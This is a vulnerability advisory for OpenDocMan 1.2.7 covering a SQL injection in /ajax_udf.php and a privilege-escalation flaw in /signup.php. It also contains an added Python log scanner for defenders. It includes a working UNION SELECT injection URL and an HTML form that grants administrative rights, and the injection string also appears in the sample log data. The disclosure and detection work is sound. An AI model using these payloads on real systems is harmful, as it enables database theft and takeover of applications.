Advisory ID: HTB23202
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
1) SQL Injection in OpenDocMan: CVE-2014-1945
The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of the MySQL server:
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
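
Added example (not part of the original advisory or of OpenDocMan's code): a check a defender could run over web server access logs to find requests to /ajax_udf.php whose add_value is not a bare identifier. It assumes common/combined log format and that legitimate add_value values contain only letters, digits and underscores; the sample log lines and the table name odm_sample_table are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate add_value is a bare identifier. The advisory's
# request starts with a table name and then appends a UNION SELECT.
SAFE_IDENTIFIER = re.compile(r"[A-Za-z0-9_]+")
# Client address, request target and status from a common/combined log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_add_value(target):
    """Return the add_value values of an /ajax_udf.php request that are not identifiers."""
    parts = urlsplit(target)
    if not parts.path.endswith("/ajax_udf.php"):
        return []
    # parse_qs percent-decodes, so %20 and %28 are seen as ' ' and '('.
    values = parse_qs(parts.query).get("add_value", [])
    return [v for v in values if not SAFE_IDENTIFIER.fullmatch(v)]


def scan(lines):
    """Return (client, status, value) for every log line with a non-identifier add_value."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for value in suspicious_add_value(target):
            hits.append((client, int(status), value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2014:10:00:01 +0000] "GET /ajax_udf.php?q=1&add_value=odm_sample_table HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Mar/2014:10:00:09 +0000] "GET /ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 730',
    '192.0.2.10 - - [05/Mar/2014:10:00:15 +0000] "GET /index.php?add_value=a%20b HTTP/1.1" 200 100',
    '203.0.113.5 - - [05/Mar/2014:10:01:00 +0000] "GET /docs/ajax_udf.php?add_value=x&add_value=y%27-- HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} add_value={value!r}")
```

A hit with status 200 on a host still running 1.2.7 or earlier is worth following up in the database logs; the check only covers the GET parameter, so it says nothing about the second issue below.
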
2) Improper Access Control in OpenDocMan: CVE-2014-1946
The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user’s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
The exploitation example below assigns administrative privileges for the current account:
<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Update to OpenDocMan v1.2.7.2
More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.